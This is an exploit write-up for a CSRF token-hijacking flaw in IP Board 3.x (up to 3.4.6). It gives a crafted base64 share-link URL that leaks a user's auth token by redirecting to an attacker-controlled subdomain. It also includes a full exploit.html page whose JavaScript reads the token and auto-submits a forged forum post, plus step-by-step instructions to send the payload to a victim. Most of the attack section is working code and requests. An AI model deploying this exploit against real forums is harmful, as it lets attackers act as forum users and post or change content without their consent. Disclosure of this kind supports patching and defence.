#Title: IP Board 3.x CSRF - Token hjiacking
#Date: 03.09.14
#Version: <= 3.4.6
#Vendor: invisionpower.com
#Author: Piotr S.
#Video-PoC: https://www.youtube.com/watch?v=G5P21TA4DjY
1) Introduction
Latest and propabbly previous IPB verions suffers on vulnerability, which allows attacker to steal CSRF token of specific user. Function, which allows users to share forum links, does not properly sanitize user input. Mentioned token is attached in request as GET parameter, so it's able to obtain it if user will be redirected to evil domain. Using the token, it is able to perform various operations as demonstrated in attached video.
2) PoC
Let's take a closer look at following url:
http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS9mb3J1bS5waHA/aWQ9MjMzNQ==
At first glance you can notice b64 string, after decoding it, you may see following address:
http://community.invisionpower.com/forum.php?id=2334
In this case, user should be redirected to default domain of the forum - community.invisionpower.com; it is able to bypass protection in this redirect, by creating particular subdomain on attacker website. it needs to contain address of victim forum otherwise it won't work.
Request:
GET /index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS54b3JiLnBsL2V4cGxvaXQuaHRtbA== HTTP/1.1
Host: community.invisionpower.com
Response:
302
Location: http://community.invisionpower.com.xorb.pl/exploit.html?forcePrint=1&_k=161cc4d2d5503fdb483979f9c164b4d3
Token is delivered as value of GET _k parameter. File to which user is redirected contains javascript, which grabs token that will be used in CSRF request.
3) Reproduction
a) Create subdomain
http://forum.victim_site.com.your_domain.pl
b) Then, create file exploit.html with this content:
<html>
<head>
<script>
onload = function ipboard(){var token = window.location.hash.split('=')[2];document.getElementById('tokens').value=token;};function fo(){document.ipboards.submit();}; setTimeout("fo()",1500);
</script>
</head>
<body>
<form action="http://a10089.try.invisionpower.com/index.php?" method="POST" id="ipboards" name="ipboards" enctype="multipart/form-data">
<input type="hidden" name="TopicTitle" value="hacked!" />
<input type="hidden" name="isRte" value="0" />
<input type="hidden" name="noSmilies" value="0" />
<input type="hidden" name="Post" value="IPboard 3.x 0day" />
<input type="hidden" name="ipsTags" value="
" />
<input type="hidden" name="enableemo" value="yes" />
<input type="hidden" name="enablesig" value="yes" />
<input type="hidden" name="st" value="0" />
<input type="hidden" name="app" value="forums" />
<input type="hidden" name="module" value="post" />
<input type="hidden" name="section" value="post" />
<input type="hidden" name="do" value="new_post_do" />
<input type="hidden" name="s" value="x" />
<input type="hidden" name="p" value="0" />
<input type="hidden" name="t" value="
" />
<input type="hidden" name="f" value="2" />
<input type="hidden" name="parent_id" value="0" />
<input type="hidden" name="attach_post_key" value="x" />
<input type="hidden" id="tokens" name="auth_key" value="7xxx3e9" />
<input type="hidden" name="removeattachid" value="0" />
<input type="hidden" name="dosubmit" value="Post New Topic" />
<input type="submit" value="Submit request" />
</form>
</body>
<h1><b>IP Board 3.X PoC<br/>wait... ;)</b></h1>
</body>
</html>
c) Create payload
http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2ZvcnVtLnZpY3RpbV9zaXRlLmNvbS55b3VyX2RvbWFpbi5jb20vZXhwbG9pdC5odG1sIw==
Now send this payload to victim - see video PoC for better understand.
4) References
- https://www.youtube.com/watch?v=G5P21TA4DjY
- https://twitter.com/evil_xorb
Happy hacking!
